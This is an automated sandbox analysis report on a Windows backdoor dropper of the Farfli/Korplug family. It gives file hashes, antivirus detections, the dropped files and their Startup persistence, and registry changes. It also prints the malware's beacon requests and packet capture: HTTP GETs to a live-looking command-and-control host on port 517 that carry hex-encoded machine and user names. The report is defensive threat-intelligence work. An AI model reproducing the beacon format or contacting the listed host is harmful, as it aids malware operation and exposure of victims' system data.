Analysis Date2015-10-10 23:04:19
MD5c824cb1c177c548c533879840bd8851c
SHA16b6f0d172024b1c0bde5c3b0704658f0f0ebb05b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4a9784dbfe142f95e46184f8742cf9ba sha1: 749840b01b010da254cb4c4bb86aeaa81172eae7 size: 36864
Section.rdata md5: 06d4b26cae87ac7c7cf9ff129a3b6793 sha1: 39fa67b14d299408f34b258e85b877bffc0e8966 size: 8192
Section.data md5: cb1a40b45fdc2cce6d76f53b41d65d50 sha1: 69e9d476c86a45fdaadcab633151448a0813c591 size: 4096
Section.rsrc md5: 346115fba14f9862c513c964a6cfb67f sha1: 5491bd1625af410654adbe004e775be2933bea9c size: 24576
Timestamp2013-12-16 08:12:37
PackerInstaller VISE Custom
PEhashb679ebb370bd4988e8680a3404391a166ccd3857
IMPhash777db06aaa83535226d79429f93d3115
AVRisingno_virus
AVMcafeeGeneric.dx!C824CB1C177C
AVAvira (antivir)BDS/Farfli.BH.3
AVTwisterTrojan.DOMG.hypg
AVAd-AwareGen:Variant.Graftor.138021
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Farfli.AUP
AVGrisoft (avg)BackDoor.Generic18.ABUX.dropper
AVSymantecBackdoor.Korplug
AVFortinetW32/Farfli.AUP!tr
AVBitDefenderGen:Variant.Graftor.138021
AVK7Trojan ( 004994471 )
AVMicrosoft Security EssentialsBackdoor:Win32/Farfli.BH
AVMicroWorld (escan)Gen:Variant.Graftor.138021[ZP]
AVMalwareBytesno_virus
AVAuthentiumno_virus
AVFrisk (f-prot)no_virus
AVIkarusTrojan.Win32.Agent
AVEmsisoftGen:Variant.Graftor.138021
AVZillya!Trojan.Farfli.Win32.22475
AVKasperskyBackdoor.Win32.Gulpix.aue
AVTrend MicroBKDR_FARFLI.XXVB
AVCAT (quickheal)Backdoor.Farfli.r4
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Graftor.138021
AVArcabit (arcavir)Gen:Variant.Graftor.138021
AVClamAVno_virus
AVDr. WebTrojan.DownLoader9.52768
AVF-Secureno_virus
AVCA (E-Trust Ino)Win32/FakeDoc_i

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\user\25-03.doc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\user\secend.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\user\25-03.doc
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\user\secend.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\user\secend.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\winlog.lnk
Creates FilePIPE\wkssvc
Creates FilePIPE\srvsvc
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\winlog.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\winlog.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\user\25-03.doc

Process
↳ C:\Documents and Settings\Administrator\Application Data\winlog.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Application Data\winlog.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.dicemention.com

Network Details:

DNSwww.dicemention.com
Type: A
123.108.111.228
HTTP GEThttp://www.dicemention.com:517/30105909000024FE010032443746363736443731363737393246004E4F52544857494E2D44333933314400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070241646D696E6973747261746F72000000000000000000000000000000000000000000000000004330353939303041000000000000000000000000000000000000000000000000000000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
HTTP GEThttp://www.dicemention.com:517/30105909000024FE010032443746363736443731363737393246004E4F52544857494E2D44333933314400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000070241646D696E6973747261746F72000000000000000000000000000000000000000000000000004330353939303041000000000000000000000000000000000000000000000000000000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Wis NT 5.0; .NET CLR 1.1.4322)
Flows TCP192.168.1.1:1031 ➝ 123.108.111.228:517
Flows TCP192.168.1.1:1032 ➝ 123.108.111.228:517

Raw Pcap
0x00000000 (00000)   47455420 2f333031 30353930 39303030   GET /30105909000
0x00000010 (00016)   30323446 45303130 30333234 34333734   024FE01003244374
0x00000020 (00032)   36333633 37333634 34333733 31333633   6363736443731363
0x00000030 (00048)   37333733 39333234 36303034 45344635   737393246004E4F5
0x00000040 (00064)   32353434 38353734 39344532 44343433   2544857494E2D443
0x00000050 (00080)   33333933 33333134 34303030 30303030   3393331440000000
0x00000060 (00096)   30303030 30303030 30303030 30303030   0000000000000000
0x00000070 (00112)   30303030 30303030 30303030 30303030   0000000000000000
0x00000080 (00128)   30303030 30303030 30303030 30303030   0000000000000000
0x00000090 (00144)   30303030 30303030 30303030 30303030   0000000000000000
0x000000a0 (00160)   30303030 30303030 30303030 30303030   0000000000000000
0x000000b0 (00176)   30303030 30303130 30303030 37303234   0000001000007024
0x000000c0 (00192)   31363436 44363936 45363937 33373437   1646D696E6973747
0x000000d0 (00208)   32363137 34364637 32303030 30303030   261746F720000000
0x000000e0 (00224)   30303030 30303030 30303030 30303030   0000000000000000
0x000000f0 (00240)   30303030 30303030 30303030 30303030   0000000000000000
0x00000100 (00256)   30303030 30303030 30303034 33333033   0000000000043303
0x00000110 (00272)   35333933 39333033 30343130 30303030   5393930304100000
0x00000120 (00288)   30303030 30303030 30303030 30303030   0000000000000000
0x00000130 (00304)   30303030 30303030 30303030 30303030   0000000000000000
0x00000140 (00320)   30303030 30303030 30303030 30303030   0000000000000000
0x00000150 (00336)   30204854 54502f31 2e310d0a 55736572   0 HTTP/1.1..User
0x00000160 (00352)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000170 (00368)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000180 (00384)   204d5349 4520362e 303b2057 6973204e    MSIE 6.0; Wis N
0x00000190 (00400)   5420352e 303b202e 4e455420 434c5220   T 5.0; .NET CLR 
0x000001a0 (00416)   312e312e 34333232 290d0a48 6f73743a   1.1.4322)..Host:
0x000001b0 (00432)   20777777 2e646963 656d656e 74696f6e    www.dicemention
0x000001c0 (00448)   2e636f6d 3a353137 0d0a4361 6368652d   .com:517..Cache-
0x000001d0 (00464)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000001e0 (00480)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f333031 30353930 39303030   GET /30105909000
0x00000010 (00016)   30323446 45303130 30333234 34333734   024FE01003244374
0x00000020 (00032)   36333633 37333634 34333733 31333633   6363736443731363
0x00000030 (00048)   37333733 39333234 36303034 45344635   737393246004E4F5
0x00000040 (00064)   32353434 38353734 39344532 44343433   2544857494E2D443
0x00000050 (00080)   33333933 33333134 34303030 30303030   3393331440000000
0x00000060 (00096)   30303030 30303030 30303030 30303030   0000000000000000
0x00000070 (00112)   30303030 30303030 30303030 30303030   0000000000000000
0x00000080 (00128)   30303030 30303030 30303030 30303030   0000000000000000
0x00000090 (00144)   30303030 30303030 30303030 30303030   0000000000000000
0x000000a0 (00160)   30303030 30303030 30303030 30303030   0000000000000000
0x000000b0 (00176)   30303030 30303130 30303030 37303234   0000001000007024
0x000000c0 (00192)   31363436 44363936 45363937 33373437   1646D696E6973747
0x000000d0 (00208)   32363137 34364637 32303030 30303030   261746F720000000
0x000000e0 (00224)   30303030 30303030 30303030 30303030   0000000000000000
0x000000f0 (00240)   30303030 30303030 30303030 30303030   0000000000000000
0x00000100 (00256)   30303030 30303030 30303034 33333033   0000000000043303
0x00000110 (00272)   35333933 39333033 30343130 30303030   5393930304100000
0x00000120 (00288)   30303030 30303030 30303030 30303030   0000000000000000
0x00000130 (00304)   30303030 30303030 30303030 30303030   0000000000000000
0x00000140 (00320)   30303030 30303030 30303030 30303030   0000000000000000
0x00000150 (00336)   30204854 54502f31 2e310d0a 55736572   0 HTTP/1.1..User
0x00000160 (00352)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000170 (00368)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000180 (00384)   204d5349 4520362e 303b2057 6973204e    MSIE 6.0; Wis N
0x00000190 (00400)   5420352e 303b202e 4e455420 434c5220   T 5.0; .NET CLR 
0x000001a0 (00416)   312e312e 34333232 290d0a48 6f73743a   1.1.4322)..Host:
0x000001b0 (00432)   20777777 2e646963 656d656e 74696f6e    www.dicemention
0x000001c0 (00448)   2e636f6d 3a353137 0d0a4361 6368652d   .com:517..Cache-
0x000001d0 (00464)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x000001e0 (00480)   650d0a0d 0a                           e....


Strings